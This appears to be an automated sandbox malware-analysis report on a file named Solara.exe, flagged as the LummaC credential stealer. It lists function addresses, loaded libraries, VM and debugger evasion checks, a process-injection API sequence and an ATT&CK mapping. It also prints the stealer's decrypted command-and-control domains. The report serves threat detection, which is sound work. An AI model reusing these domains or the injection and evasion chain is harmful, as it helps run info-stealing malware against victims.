Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0040F150	1_2_0040F150
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00445100	1_2_00445100
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00428110	1_2_00428110
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0042D1D1	1_2_0042D1D1
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0040B190	1_2_0040B190
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0040127F	1_2_0040127F
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0042C204	1_2_0042C204
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00436290	1_2_00436290
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_004452A0	1_2_004452A0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00401356	1_2_00401356
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_004273E0	1_2_004273E0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0041E400	1_2_0041E400
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00444420	1_2_00444420
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_004304A1	1_2_004304A1
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00422560	1_2_00422560
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_004235E0	1_2_004235E0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00434640	1_2_00434640
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0043A65C	1_2_0043A65C
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00403630	1_2_00403630
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_004096B7	1_2_004096B7
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0041771C	1_2_0041771C
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0040972E	1_2_0040972E
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00434860	1_2_00434860
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00407830	1_2_00407830
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0043B8D0	1_2_0043B8D0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_004408D0	1_2_004408D0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_004468B0	1_2_004468B0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0042B963	1_2_0042B963
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00444900	1_2_00444900
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0042A920	1_2_0042A920
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00443930	1_2_00443930
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_004309D7	1_2_004309D7
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_004319E7	1_2_004319E7
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0041F980	1_2_0041F980
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0041DA30	1_2_0041DA30
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0042CAF1	1_2_0042CAF1
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0043BB30	1_2_0043BB30
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00446BC0	1_2_00446BC0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00409C01	1_2_00409C01
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00408CCF	1_2_00408CCF
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0042DC84	1_2_0042DC84
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0040BCA0	1_2_0040BCA0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00429D54	1_2_00429D54
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00404D70	1_2_00404D70
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0040AD00	1_2_0040AD00
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00428D20	1_2_00428D20
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00427D3F	1_2_00427D3F
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00444DC0	1_2_00444DC0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0042FDD7	1_2_0042FDD7
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0042FDE1	1_2_0042FDE1
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00420D85	1_2_00420D85
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00435E20	1_2_00435E20
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00406E30	1_2_00406E30
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00422E90	1_2_00422E90
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00428EB0	1_2_00428EB0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00430FE2	1_2_00430FE2
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C22093	1_2_00C22093
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C7001B	1_2_00C7001B
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C222DB	1_2_00C222DB
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C7038F	1_2_00C7038F
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C8452C	1_2_00C8452C
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C706F4	1_2_00C706F4
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C8C87D	1_2_00C8C87D
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C6E816	1_2_00C6E816
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C80980	1_2_00C80980
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C7E901	1_2_00C7E901
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C9CA4C	1_2_00C9CA4C
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C56A58	1_2_00C56A58
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C6EB5E	1_2_00C6EB5E
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C70B15	1_2_00C70B15
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C80EF0	1_2_00C80EF0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C6EEB5	1_2_00C6EEB5
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C70F45	1_2_00C70F45
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C930FA	1_2_00C930FA
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C6F1FD	1_2_00C6F1FD
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C993F8	1_2_00C993F8
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C81330	1_2_00C81330
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C6F58B	1_2_00C6F58B
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C4F50C	1_2_00C4F50C
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C51670	1_2_00C51670
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C9B71C	1_2_00C9B71C
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C6F928	1_2_00C6F928
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C6FCB6	1_2_00C6FCB6
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C7DE2E	1_2_00C7DE2E

Source: C:\Users\user\Desktop\Solara.exe	Code function: String function: 0041D600 appears 217 times
Source: C:\Users\user\Desktop\Solara.exe	Code function: String function: 00C4F210 appears 64 times
Source: C:\Users\user\Desktop\Solara.exe	Code function: String function: 00C5D500 appears 46 times
Source: C:\Users\user\Desktop\Solara.exe	Code function: String function: 00C77A89 appears 58 times
Source: C:\Users\user\Desktop\Solara.exe	Code function: String function: 00C4FFC0 appears 124 times
Source: C:\Users\user\Desktop\Solara.exe	Code function: String function: 00C8B8A4 appears 64 times
Source: C:\Users\user\Desktop\Solara.exe	Code function: String function: 0040C800 appears 63 times
Source: C:\Users\user\Desktop\Solara.exe	Code function: String function: 00C4F1DD appears 202 times

Source: Solara.exe, 00000000.00000000.1692136684.0000000000D13000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePrint.Exej% vs Solara.exe
Source: Solara.exe, 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePrint.Exej% vs Solara.exe
Source: Solara.exe, 00000001.00000003.1706262862.00000000028DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePrint.Exej% vs Solara.exe
Source: Solara.exe	Binary or memory string: OriginalFilenamePrint.Exej% vs Solara.exe

Source: Solara.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/0@11/9

Source: C:\Users\user\Desktop\Solara.exe

Code function: 1_2_0043C420 CoCreateInstance,

1_2_0043C420

Source: Solara.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Solara.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe

File read: C:\Users\user\Desktop\Solara.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Solara.exe "C:\Users\user\Desktop\Solara.exe"
Source: C:\Users\user\Desktop\Solara.exe	Process created: C:\Users\user\Desktop\Solara.exe "C:\Users\user\Desktop\Solara.exe"
Source: C:\Users\user\Desktop\Solara.exe	Process created: C:\Users\user\Desktop\Solara.exe "C:\Users\user\Desktop\Solara.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Solara.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Solara.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Solara.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Solara.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Solara.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Solara.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Solara.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: Solara.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\d67tcqi\Literally.pdb source: Solara.exe
Source:	Binary string: C:\d67tcqi\Literally.pdb source: Solara.exe

Source: Solara.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Solara.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Solara.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Solara.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Solara.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C4F1AB push ecx; ret	0_2_00C4F1BE
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C2967B push 8B00CA91h; iretd	0_2_00C29680
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C29637 push 8B00CA91h; iretd	0_2_00C2963C
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00400000 push eax; iretd	1_2_004000A1
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0041C0F3 push cs; mov dword ptr [esp], esi	1_2_0041C0FB
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0044D3D8 push edx; retf 0041h	1_2_0044D3D9
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0044C991 pushfd ; ret	1_2_0044C99D
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0044CD67 pushfd ; iretd	1_2_0044CD8F
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0044CE33 pushfd ; retf	1_2_0044CE34
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C4F1AB push ecx; ret	1_2_00C4F1BE
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C2967B push 8B00CA91h; iretd	1_2_00C29680
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C29637 push 8B00CA91h; iretd	1_2_00C2963C

Source: C:\Users\user\Desktop\Solara.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Solara.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe

API coverage: 8.4 %

Source: C:\Users\user\Desktop\Solara.exe TID: 6860

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C9546A FindFirstFileExW,	0_2_00C9546A
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C95854 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00C95854
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C9546A FindFirstFileExW,	1_2_00C9546A
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C95854 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00C95854

Source: Solara.exe, 00000001.00000002.1828698814.0000000000F4D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1748853374.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1748927531.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1828000747.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828698814.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799781454.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1738612549.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1828000747.0000000000F4D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Solara.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe

Code function: 1_2_00442CC0 LdrInitializeThunk,

1_2_00442CC0

Source: C:\Users\user\Desktop\Solara.exe

Code function: 0_2_00C94EEB IsDebuggerPresent,OutputDebugStringW,

0_2_00C94EEB

Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C22606 mov edi, dword ptr fs:[00000030h]	0_2_00C22606
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C86E1E mov ecx, dword ptr fs:[00000030h]	0_2_00C86E1E
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C9799C mov eax, dword ptr fs:[00000030h]	0_2_00C9799C
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00D0FABD mov edi, dword ptr fs:[00000030h]	0_2_00D0FABD
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C22559 mov edi, dword ptr fs:[00000030h]	0_2_00C22559
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C977F3 mov eax, dword ptr fs:[00000030h]	0_2_00C977F3
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C977B0 mov eax, dword ptr fs:[00000030h]	0_2_00C977B0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C9776D mov eax, dword ptr fs:[00000030h]	0_2_00C9776D
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C9784E mov eax, dword ptr fs:[00000030h]	0_2_00C9784E
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C979CD mov eax, dword ptr fs:[00000030h]	0_2_00C979CD
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C97958 mov eax, dword ptr fs:[00000030h]	0_2_00C97958
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C97914 mov eax, dword ptr fs:[00000030h]	0_2_00C97914
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C22559 mov edi, dword ptr fs:[00000030h]	1_2_00C22559
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C22606 mov edi, dword ptr fs:[00000030h]	1_2_00C22606
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C86E1E mov ecx, dword ptr fs:[00000030h]	1_2_00C86E1E
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C977F3 mov eax, dword ptr fs:[00000030h]	1_2_00C977F3
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C977B0 mov eax, dword ptr fs:[00000030h]	1_2_00C977B0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C9776D mov eax, dword ptr fs:[00000030h]	1_2_00C9776D
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C9784E mov eax, dword ptr fs:[00000030h]	1_2_00C9784E
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C979CD mov eax, dword ptr fs:[00000030h]	1_2_00C979CD
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C9799C mov eax, dword ptr fs:[00000030h]	1_2_00C9799C
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C97958 mov eax, dword ptr fs:[00000030h]	1_2_00C97958
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C97914 mov eax, dword ptr fs:[00000030h]	1_2_00C97914

Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C775E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00C775E0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C4F8E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00C4F8E8
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C4FD68 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00C4FD68
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C775E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00C775E0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C4F8E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00C4F8E8
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C4FD68 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00C4FD68

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Solara.exe

Code function: 0_2_00D0FABD CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

0_2_00D0FABD

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Solara.exe

Memory written: C:\Users\user\Desktop\Solara.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Solara.exe	String found in binary or memory: allocatinow.sbsw
Source: Solara.exe	String found in binary or memory: enlargkiw.sbsk
Source: Solara.exe	String found in binary or memory: explorationmsn.stor
Source: Solara.exe	String found in binary or memory: mathcucom.sbsk
Source: Solara.exe	String found in binary or memory: drawwyobstacw.sbs
Source: Solara.exe	String found in binary or memory: ehticsprocw.sbsw
Source: Solara.exe	String found in binary or memory: condifendteu.sbs
Source: Solara.exe	String found in binary or memory: resinedyw.sbsk
Source: Solara.exe	String found in binary or memory: vennurviot.sbsi

Source: C:\Users\user\Desktop\Solara.exe

Process created: C:\Users\user\Desktop\Solara.exe "C:\Users\user\Desktop\Solara.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe	Code function: GetLocaleInfoW,	0_2_00C9A011
Source: C:\Users\user\Desktop\Solara.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00C9A13A
Source: C:\Users\user\Desktop\Solara.exe	Code function: GetLocaleInfoW,	0_2_00C9A240
Source: C:\Users\user\Desktop\Solara.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00C9A30F
Source: C:\Users\user\Desktop\Solara.exe	Code function: GetLocaleInfoEx,FormatMessageA,	0_2_00C2C540
Source: C:\Users\user\Desktop\Solara.exe	Code function: GetLocaleInfoEx,	0_2_00C4E558
Source: C:\Users\user\Desktop\Solara.exe	Code function: EnumSystemLocalesW,	0_2_00C8B2A2
Source: C:\Users\user\Desktop\Solara.exe	Code function: EnumSystemLocalesW,	0_2_00C8B433
Source: C:\Users\user\Desktop\Solara.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_00C9998D
Source: C:\Users\user\Desktop\Solara.exe	Code function: EnumSystemLocalesW,	0_2_00C99C98
Source: C:\Users\user\Desktop\Solara.exe	Code function: EnumSystemLocalesW,	0_2_00C99C2F
Source: C:\Users\user\Desktop\Solara.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00C99DBE
Source: C:\Users\user\Desktop\Solara.exe	Code function: GetLocaleInfoW,	0_2_00C8BD5E
Source: C:\Users\user\Desktop\Solara.exe	Code function: EnumSystemLocalesW,	0_2_00C99D33
Source: C:\Users\user\Desktop\Solara.exe	Code function: GetLocaleInfoW,	1_2_00C9A011
Source: C:\Users\user\Desktop\Solara.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_00C9A13A
Source: C:\Users\user\Desktop\Solara.exe	Code function: GetLocaleInfoW,	1_2_00C9A240
Source: C:\Users\user\Desktop\Solara.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_00C9A30F
Source: C:\Users\user\Desktop\Solara.exe	Code function: GetLocaleInfoEx,FormatMessageA,	1_2_00C2C540
Source: C:\Users\user\Desktop\Solara.exe	Code function: GetLocaleInfoEx,	1_2_00C4E558
Source: C:\Users\user\Desktop\Solara.exe	Code function: EnumSystemLocalesW,	1_2_00C8B2A2
Source: C:\Users\user\Desktop\Solara.exe	Code function: EnumSystemLocalesW,	1_2_00C8B433
Source: C:\Users\user\Desktop\Solara.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	1_2_00C9998D
Source: C:\Users\user\Desktop\Solara.exe	Code function: EnumSystemLocalesW,	1_2_00C99C98
Source: C:\Users\user\Desktop\Solara.exe	Code function: EnumSystemLocalesW,	1_2_00C99C2F
Source: C:\Users\user\Desktop\Solara.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_00C99DBE
Source: C:\Users\user\Desktop\Solara.exe	Code function: GetLocaleInfoW,	1_2_00C8BD5E
Source: C:\Users\user\Desktop\Solara.exe	Code function: EnumSystemLocalesW,	1_2_00C99D33

Source: C:\Users\user\Desktop\Solara.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe

Code function: 0_2_00C4FC3D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00C4FC3D

Source: C:\Users\user\Desktop\Solara.exe

Code function: 0_2_00C9473C GetTimeZoneInformation,

0_2_00C9473C

Source: C:\Users\user\Desktop\Solara.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Solara.exe PID: 6812, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Solara.exe PID: 6812, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	11 Virtualization/Sandbox Evasion	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	2 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
